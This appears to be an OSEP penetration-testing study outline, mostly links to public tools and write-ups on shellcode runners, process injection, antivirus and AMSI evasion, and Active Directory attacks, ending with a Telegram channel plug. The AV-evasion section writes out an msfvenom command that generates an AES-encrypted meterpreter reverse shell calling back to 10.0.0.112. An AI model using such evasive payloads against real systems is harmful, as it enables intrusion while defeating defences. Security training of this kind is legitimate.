Experienced-Pentester-OSEP
Operating System and Programming Theory
Win32 API’s
https://rastamouse.me/blog/process-injection-dinvoke/
Windows Registry
https://en.wikipedia.org/wiki/Windows_Registry
https://www.lifewire.com/windows-registry-2625992
Client-Side Code Execution With Office
Staged vs Non-Staged Payloads
https://buffered.io/posts/staged-vs-stageless-handlers/
Droppers / Stagers
https://en.wikipedia.org/wiki/Dropper_(malware)
https://rastamouse.me/blog/asb-bypass-pt2/
HTML Smuggling (Not HTTP Request Smuggling)
https://outflank.nl/blog/2018/08/14/html-smuggling-explained/
https://github.com/Arno0x/EmbedInHTML
Phishing with Microsoft Office
https://digitalguardian.com/blog/what-macro-malware
https://stackoverflow.com/questions/51296291/auto-open-sub-vba/51296480
https://github.com/Arno0x/EmbedInHTML
Phishing Pretexts
https://github.com/L4bF0x/PhishingPretexts
Calling Win32 APIs from VBA
https://www.aeternus.sg/how-to-use-windows-api-in-vba/
https://renenyffenegger.ch/notes/development/languages/VBA/Win-API/index
VBA Shellcode Runners
https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
https://github.com/infosecn1nja/MaliciousMacroMSBuild
PowerShell Shellcode Runner
https://devblogs.microsoft.com/scripting/use-powershell-to-interact-with-the-windows-api-part-1/
https://www.raydbg.com/2017/Call-Native-Win32-API-in-PowerShell/
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
https://powersploit.readthedocs.io/en/latest/CodeExecution/Invoke-ReflectivePEInjection/
https://stackoverflow.com/questions/63593930/how-to-call-a-win32-api-function-from-powershell
PowerShell in Memory
https://isc.sans.edu/forums/diary/Fileless+Malicious+PowerShell+Sample/23081/
DelegateType Reflection
https://www.powershellgallery.com/packages/poke/1.0.0.2/Content/delegate.ps1
Proxy-Aware PowerShell Communications
http://woshub.com/using-powershell-behind-a-proxy/
https://stackoverflow.com/questions/14263359/access-web-using-powershell-and-proxy
https://cloudrun.co.uk/powershell/configuring-powershell-to-work-behind-a-proxy-server/
https://medium.com/river-yang/powershell-working-behind-a-proxy-with-authentication-eb68a337f222
Client-Side Code Execution With Windows Script Host
JScript Execution
https://docs.microsoft.com/en-us/previous-versions/windows/desktop/indexsrv/running-a-jscript-query
JScript Basic Dropper
https://github.com/hlldz/SpookFlare
HTA, VBA, JScript, CScript Payload Creation and Obfuscation
https://github.com/tyranid/DotNetToJScript
https://github.com/med0x2e/GadgetToJScript
SharpShooter
https://github.com/mdsecactivebreach/SharpShooter
Process Injection and Migration
Process Injection
https://github.com/3xpl01tc0d3r/ProcessInjection
https://github.com/secrary/InjectProc
https://rastamouse.me/blog/process-injection-dinvoke/
https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing
DLL Injection
https://medium.com/bug-bounty-hunting/dll-injection-attacks-in-a-nutshell-71bc84ac59bd
http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html
https://github.com/fdiskyou/injectAllTheThings
Reflective DLL Injection
https://github.com/stephenfewer/ReflectiveDLLInjection
Reflect DLL Injection via PowerShell
https://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
Process Hollowing
https://gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
https://github.com/caesartcs/ProcessHollowing
https://github.com/m0n0ph1/Process-Hollowing
Intro to AV Evasion
Bypassing Antivirus with Metasploit
Metasploit Encryptors
AES Encrypted MSFVenom Payload
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.112 LPORT=9999 -f csharp --encrypt aes256 --encrypt-key 12345678901234567890123456789012 --encrypt-iv 1234567890123456
(Encryption Key must be 32 bytes) (Encryption IV must be 16 bytes)
Other MSFVenom Encryptor Options
$ msfvenom --list encryptFramework Encryption Formats [--encrypt <value>]
================================================ Name
----
aes256
base64
rc4
xor
.NET/C# AES Payload Encryption
https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/
https://github.com/cribdragg3r/Simple-Loader
Advanced Antivirus Evasion
Antimalware Scanning Interface (AMSI)
https://rastamouse.me/blog/asb-bypass-pt2/
https://rastamouse.me/blog/asb-bypass-pt3/
https://rastamouse.me/blog/asb-bypass-pt4/
Application Whitelisting
Theory
Bypasses
https://github.com/api0cradle/UltimateAppLockerByPassList
https://github.com/0xVIC/myAPPLockerBypassSummary
Bypassing Network Filters
Domain Fronting
https://digi.ninja/blog/domain_fronting.php
https://attack.mitre.org/techniques/T1090/004/
https://medium.com/@malcomvetter/simplifying-domain-fronting-8d23dcb694a0
DNS Tunneling
https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling
https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
Linux Post-Exploitation
Antiscan me
Shared DLL Hijacking
https://www.boiteaklou.fr/Abusing-Shared-Libraries.html
https://sumit-ghosh.com/articles/hijacking-library-functions-code-injection-ld-preload/
Kiosk Breakouts / Attacks
https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/
https://sra.io/blog/sitekiosk-breakout/
https://www.engetsu-consulting.com/blog/kiosk-breakout-windows
Windows Credentials
Local Windows Credentials
SAM Dump
Hardening the Local Admin Account (LAPS)
https://rastamouse.me/blog/laps-pt1/
https://rastamouse.me/blog/laps-pt2/
https://github.com/kfosaaen/Get-LAPSPasswords
https://blog.netspi.com/running-laps-around-cleartext-passwords/
Microsoft SQL Attacks
MS SQL Enumeration
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
https://www.mssqltips.com/sqlservertip/4181/inventory-sql-logins-on-a-sql-server-with-powershell/
UNC Path Injection
https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e
https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/
https://hackingandsecurity.blogspot.com/2017/07/10-places-to-stick-your-unc-path.html
Active Directory Exploitation
BloodHound
https://github.com/BloodHoundAD/BloodHound
Ingestors
https://github.com/BloodHoundAD/SharpHound
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/AzureHound.ps1
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
https://github.com/fox-it/BloodHound.py
Abusing Object Security Permissions
Kerberos Delegation
Unconstrained Delegation
https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
https://www.qomplx.com/qomplx-knowledge-kerberos-delegation-attacks-explained/
Constrained Delegation
Resource-Based Constrained Delegation
https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
Active Directory Inter-Forest Exploitation
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/
https://adsecurity.org/?p=1588
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
TO Learn More Join Us At Google Developer
We discuss and learn all the topics related
to Developers like web, App, AI, ML, IOT, firebase, GCP, Ethical Hacking etc . . .
Please support our channel
https://telegramchannels.me/channels/google_developer